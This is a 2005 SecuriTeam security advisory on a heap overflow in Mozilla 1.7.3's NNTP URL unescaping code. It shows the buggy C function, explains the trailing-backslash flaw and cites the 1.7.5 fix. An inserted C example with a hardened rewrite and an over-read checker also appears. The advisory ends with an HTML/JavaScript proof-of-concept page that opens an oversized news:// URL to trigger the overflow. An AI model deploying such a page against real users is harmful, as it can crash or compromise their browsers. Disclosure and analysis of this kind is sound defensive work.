[UNIX] Mozilla Browser NNTP Heap Overflow


Date: 2 Jan 2005 17:06:08 +0200
From: SecuriTeam <support@securiteam.com>
To: [email protected]
Subject: [UNIX] Mozilla Browser NNTP Heap Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com




  Mozilla Browser NNTP Heap Overflow
------------------------------------------------------------------------


SUMMARY

A critical security vulnerability has been found in the Mozilla Project's 
code handling the NNTP protocol.

DETAILS

Vulnerable Systems:
 * Mozilla Browser version 1.7.3 and prior with mozilla-mail

Immune Systems:
 * Mozilla Browser version 1.7.5 or newer

The Mozilla browser supports NNTP URLs, so a remote web page can make the 
client open a news:// connection to any server. Maurycy found a flaw in the 
NNTP handling code which may cause a heap overflow and allow a remote 
attacker to execute arbitrary code on the client machine.

Buggy function from nsNNTPProtocol.cpp (Mozilla 1.7.3):

char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)
{
  /* result is sized for the input; decoding only shrinks the data, so the
     size is sufficient as long as the loop stops at the input's terminator */
  char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) + 1);
  if (result)
  {
    char *resultPtr = result;
    while (1)
    {
      char ch = *commandSpecificData++;
      if (!ch)
        break;
      if (ch == '\\')
      {
        /* the two bytes after '\' are consumed without checking for NUL:
           a '\' at (or one byte before) the end steps over the terminator */
        char scratchBuf[3];
        scratchBuf[0] = (char) *commandSpecificData++;
        scratchBuf[1] = (char) *commandSpecificData++;
        scratchBuf[2] = '\0';
        int accum = 0;
        PR_sscanf(scratchBuf, "%X", &accum);
        *resultPtr++ = (char) accum;
      }
      else
        *resultPtr++ = ch;
    }
    *resultPtr = '\0';
  }
  return result;
}

When the last character of commandSpecificData (the one followed by the 
terminating NUL) is '\\', the two unconditional increments after the 
backslash step past the terminator, so the copying loop never sees the end 
of the source string. It keeps reading whatever follows on the heap and 
copying it into result, which was allocated with only PL_strlen() + 1 
bytes, until it happens to hit a zero byte: a heap overflow. The same 
happens when only one character follows the backslash, since the second 
scratchBuf read then lands on the NUL and the pointer moves one byte past 
it.
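The two cases just described, as an added example that is not part of the advisory or of Mozilla's code: a bounded rewrite of the unescape loop next to an instrumented model of the original one, so the over-read can be demonstrated without corrupting memory. The names (unescape_search_url, original_loop_overreads, unescape_matches) and the policy for incomplete or non-hex escapes (copied literally) are my own choices, not the fix shipped in Mozilla 1.7.5.

```c
/* Added example (not Mozilla code): a bounded rewrite of the unescape loop
 * beside an instrumented model of the original one. Function names are
 * hypothetical. Compile: cc -Wall -o unescape unescape.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Value of a hex digit, or -1 if c is not one. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Hardened replacement for MSG_UnEscapeSearchUrl (example, not the 1.7.5 fix):
 * indexes never pass the terminating NUL, "\XX" with two hex digits decodes
 * to byte XX, and an incomplete or non-hex escape is copied literally.
 * Output is never longer than input, so strlen+1 bytes always suffice.
 * Caller frees the result; NULL on allocation failure. */
char *unescape_search_url(const char *src)
{
    size_t len = strlen(src);
    char *result = malloc(len + 1);
    if (!result)
        return NULL;
    char *out = result;
    for (size_t i = 0; i < len; ) {
        if (src[i] == '\\' && i + 2 < len) {      /* both escape digits exist */
            int hi = hexval((unsigned char)src[i + 1]);
            int lo = hexval((unsigned char)src[i + 2]);
            if (hi >= 0 && lo >= 0) {
                *out++ = (char)(hi * 16 + lo);
                i += 3;
                continue;
            }
        }
        *out++ = src[i++];                         /* literal byte, incl. stray '\' */
    }
    *out = '\0';
    return result;
}

/* Model of the original loop's reads: same control flow, but every index is
 * checked against the terminator instead of being dereferenced blindly.
 * Returns 1 if the original code would read past the NUL (and then keep
 * copying the heap bytes that follow into its result buffer, overflowing it),
 * 0 if it terminates cleanly. */
int original_loop_overreads(const char *src)
{
    size_t nul = strlen(src);          /* index of the terminating NUL */
    size_t i = 0;                      /* index of the next read */
    for (;;) {
        if (i > nul)
            return 1;                  /* *commandSpecificData++ past the NUL */
        char ch = src[i++];
        if (!ch)
            return 0;
        if (ch == '\\') {
            /* scratchBuf[0] and scratchBuf[1] are read unconditionally */
            if (i + 1 > nul)
                return 1;              /* second scratch read is past the NUL */
            i += 2;
        }
    }
}

/* Decode `in` and compare with `expect`; 1 on match. Frees the buffer. */
int unescape_matches(const char *in, const char *expect)
{
    char *got = unescape_search_url(in);
    int ok = got != NULL && strcmp(got, expect) == 0;
    free(got);
    return ok;
}

int main(void)
{
    /* Constructed inputs: a normal escape, a trailing backslash (the case in
     * the advisory), and a one-digit escape at the end of the string. */
    const char *samples[] = { "profile/\\41\\42", "profile/\\", "profile/\\4" };
    for (size_t k = 0; k < sizeof samples / sizeof samples[0]; k++) {
        char *dec = unescape_search_url(samples[k]);
        printf("%-16s original loop overreads: %d  hardened: \"%s\"\n",
               samples[k], original_loop_overreads(samples[k]), dec);
        free(dec);
    }
    return 0;
}
```

The model reports an over-read for both "profile/\" and "profile/\4", which is why the advisory's proof of concept only needs to end the URL in a single backslash; the hardened loop treats both as literal text and stops at the terminator.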

Solution:
This bug is fixed in Mozilla 1.7.5 (Bug 264388). Mozilla developer Dan 
Veditz claims that it is not exploitable: "A '\' on the end will 
certainly trash memory, but at that point you're no longer reading 
attacker-supplied data;".

On my RedHat 9.0 with Mozilla 1.7.3 the attached proof of concept code 
overflows the buffer using attacker-supplied data. I decided to make this 
bug public because the Mozilla Team has not warned users.

Proof of concept:
<html>
<script>
// Build a news:// URL whose search part is very long and ends in a lone
// backslash: the final '\' makes the unescape loop step over the string
// terminator and keep copying heap data into the result buffer.
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for(l = 0; l < 16376; l++)
  i=i+"A";
i=i+"/?profile/";
for(l = 0; l < 16384; l++)
  i=i+"A";
i=i+"\\";        // trailing backslash is the last character of the string
window.open(i);
</script>
</html>


ADDITIONAL INFORMATION

The information has been provided by <mailto:z33d@isec.pl> Maurycy 
Prodeus.
The original article can be found at:  
http://isec.pl/vulnerabilities/isec-0020-mozilla.txt





DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



